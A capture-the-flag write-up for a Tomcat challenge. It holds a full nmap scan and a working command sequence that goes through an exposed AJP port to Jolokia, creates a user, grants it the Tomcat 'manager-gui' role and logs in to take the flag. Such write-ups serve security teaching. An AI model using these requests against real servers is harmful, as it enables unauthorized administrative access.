An exposed Apache JServ Protocol server allows an attacker to proxy requests to Tomcat server running Jolokia. The Jolokia instance allows the attacker to create user accounts and grant manager rights.

Challenge Description

Nya Nya Nya, target: 47.75.128.216

Points

588 Points

15 Solved

Solution

First, we scan the target to find exposed ports.

nmap -p- -A 47.75.128.216

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-14 05:29 +08
Nmap scan report for 47.75.128.216
Host is up (0.044s latency).
Not shown: 65527 filtered ports
PORT      STATE  SERVICE       VERSION
22/tcp    open   ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:1b:36:12:eb:cd:b3:f6:d5:b7:06:e0:7d:c9:61:00 (RSA)
|_  256 bf:76:6f:85:2a:c3:82:75:66:97:74:5e:c5:87:e2:42 (ECDSA)
80/tcp    closed http
443/tcp   closed https
2333/tcp  closed snapp
3389/tcp  closed ms-wbt-server
8009/tcp  open   ajp13         Apache Jserv (Protocol v1.3)
| ajp-methods:
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
9999/tcp  open   http          nginx 1.10.3 (Ubuntu)
|_hadoop-datanode-info:
|_hadoop-jobtracker-info:
|_hadoop-tasktracker-info:
|_hbase-master-info:
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Site doesn't have a title (application/octet-stream).
10250/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The interesting port here is 8009, the Apache JServ Protocol server. We used a heavily customised version of https://github.com/hypn0s/AJPy to perform queries. The AJP server acts as a binary protocol proxy to communicate with the Tomcat server.

There is a hint given during the competition:

the tomcat deployed jolokia.war

We can make queries to this Jolokia web application.

$ python tomcat.py -t 47.75.128.216 req -m GET /jolokia | jq
{
  "request": {
    "type": "version"
  },
  "value": {
    "agent": "1.5.0",
    "protocol": "7.2",
    "config": {
      "listenForHttpService": "true",
      "maxCollectionSize": "0",
      "authIgnoreCerts": "false",
      "agentId": "local-23766-52c7cdf2-servlet",
      "agentType": "servlet",
      "policyLocation": "classpath:/jolokia-access.xml",
      "agentContext": "/jolokia",
      "mimeType": "text/plain",
      "discoveryEnabled": "false",
      "streaming": "true",
      "historyMaxEntries": "10",
      "allowDnsReverseLookup": "true",
      "maxObjects": "0",
      "debug": "false",
      "serializeException": "false",
      "detectorOptions": "{}",
      "dispatcherClasses": "org.jolokia.http.Jsr160ProxyNotEnabledByDefaultAnymoreDispatcher",
      "maxDepth": "15",
      "authMode": "basic",
      "canonicalNaming": "true",
      "allowErrorDetails": "true",
      "realm": "jolokia",
      "includeStackTrace": "true",
      "useRestrictorService": "false",
      "debugMaxEntries": "100"
    },
    "info": {
      "product": "tomcat",
      "vendor": "Apache",
      "version": "8.0.32"
    }
  },
  "timestamp": 1523655661,
  "status": 200
}

We can use Jolokia to create roles, a user, and add those roles to the newly created user. The important role to assign is ‘manager-gui’ which will grant Tomcat manager rights to the user.

First, creating a user:

$ python2 tomcat.py -t 47.75.128.216 req -m POST /jolokia --data '{
   "type":"EXEC", "mbean":"Users:database=UserDatabase,type=UserDatabase",
   "operation": "createUser", "arguments": ["greyhats", "greyhats", ""]
}' | jq
{
  "request": {
    "mbean": "Users:database=UserDatabase,type=UserDatabase",
    "arguments": [
      "greyhats",
      "greyhats",
      ""
    ],
    "type": "exec",
    "operation": "createUser"
  },
  "value": "Users:type=User,username=\"greyhats\",database=UserDatabase",
  "timestamp": 1523655958,
  "status": 200
}

Next, creating the role:

$ python2 tomcat.py -t 47.75.128.216 req -m POST /jolokia --data '{
   "type":"EXEC", "mbean":"Users:database=UserDatabase,type=UserDatabase",
   "operation": "createRole", "arguments": ["manager-gui", ""]
}'  | jq
{
  "request": {
    "mbean": "Users:database=UserDatabase,type=UserDatabase",
    "arguments": [
      "manager-gui",
      ""
    ],
    "type": "exec",
    "operation": "createRole"
  },
  "value": "Users:type=Role,rolename=\"manager-gui\",database=UserDatabase",
  "timestamp": 1523656029,
  "status": 200
}

Finally, adding the role:

python2 tomcat.py -t 47.75.128.216 req -m POST /jolokia --data '{
   "type":"EXEC", "mbean":"Users:database=UserDatabase,type=User,username=\"greyhats\"",
   "operation": "addRole", "arguments": ["manager-gui"]
}' | jq
{
  "request": {
    "mbean": "Users:database=UserDatabase,type=User,username=\"greyhats\"",
    "arguments": [
      "manager-gui"
    ],
    "type": "exec",
    "operation": "addRole"
  },
  "value": null,
  "timestamp": 1523656086,
  "status": 200
}

Now, we can login to the Tomcat Manager and grab the flag:

$ python2 tomcat.py -t 47.75.128.216 req -u greyhats -p greyhats -m GET /manager/html | grep HITB
 <td class="row-left" bgcolor="#FFFFFF" rowspan="2"><small>HITB{TOMCAT_TOMCAT_KAWAII}</small></td>

Flag: HITB{TOMCAT_TOMCAT_KAWAII}

Leave a Comment